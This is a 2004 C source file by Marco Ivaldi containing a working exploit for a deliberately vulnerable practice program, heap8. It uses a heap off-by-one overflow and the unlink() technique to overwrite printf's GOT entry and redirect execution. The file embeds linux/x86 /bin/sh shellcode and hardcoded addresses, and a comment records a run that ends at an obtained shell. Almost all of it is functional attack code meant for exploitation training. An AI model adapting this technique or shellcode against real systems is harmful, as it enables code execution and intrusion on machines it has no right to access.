/*
 * $Id: heap8-ex.c,v 1.1 2004/06/02 12:15:03 raptor Exp $
 *
 * heap8-ex.c - heap8.c exploit (heap-based off-by-one)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit combines the heap-to-stack unlink() technique (see heap4-ex*)
 * with the heap-based off-by-one technique (see heap6-ex* and heap7-ex*), to
 * exploit the vulnerable program.
 *
 * Buffer structure:
 * [printf_addr - 12] [ret] [prev_size]
 *
 * raptor@karma:~/devel/heap$ uname -a
 * Linux karma 2.4.18-1-686-smp #1 SMP Mon Jan 5 20:42:23 UTC 2004 i686 unknown
 * raptor@karma:~/devel/heap$ gcc --version
 * 2.95.4
 * raptor@karma:~/devel/heap$ ./heap8-ex
 * Using ret address       : 0xbfffffcf
 * Using printf() address  : 0x8049934
 * Using vuln buf address  : 0x8049968
 * Using argv[1] address   : 0xbfffffc2
 * Using special prev_size : 1208261046
 *
 * argv[1] is at 0xbfffffc2
 * len: 12
 * p0 -> 0x8049968
 * p1 -> 0x8049978
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 17 (0x11)
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 0 ((nil))
 * sh-2.05a$ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap8"	// the vulnerable program
#define BUFSIZE		12 + 1		// size of the evil buf
#define PRINTF		0x08049934	// printf() address in .got
#define	MALLOC		0x08049968	// address of the vuln buf
#define	ARGV1		0xbfffffc2	// address of the argv[1]

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE];
	char	*p;

	char	*env[2] = {sc, NULL};
	int	printf_addr = PRINTF;

	/* calculate the ret address in envp */
	int 	ret = 0xbffffffa - strlen(sc) - strlen(VULN);

	/*
	 * set up the special prev_size field: we actually wanna end up
	 * pointing to the stack, exactly 8 bytes before argv[1] to ensure
	 * the fd and bk are hit right, so we add 8 before complementing.
	 */
	int	prev_size = -(ARGV1 - (MALLOC + (12 - 4))) + 8;

	/* prepare the evil buffer */
	p = buf;
	*((void **)p) = (void *)(printf_addr - 12);	/* fd field */
	p += 4;
	*((void **)p) = (void *)(ret);			/* bk field */
	p += 4;
	*((void **)p) = (void *)(prev_size);		/* special prev_size */
	p += 4;
	*p = 0x0;

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using printf() address\t: %p\n", printf_addr);
	fprintf(stderr, "Using vuln buf address\t: %p\n", MALLOC);
	fprintf(stderr, "Using argv[1] address\t: %p\n", ARGV1);
	fprintf(stderr, "Using special prev_size\t: %d\n\n", prev_size);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf, NULL, env);
	perror("execle");
}
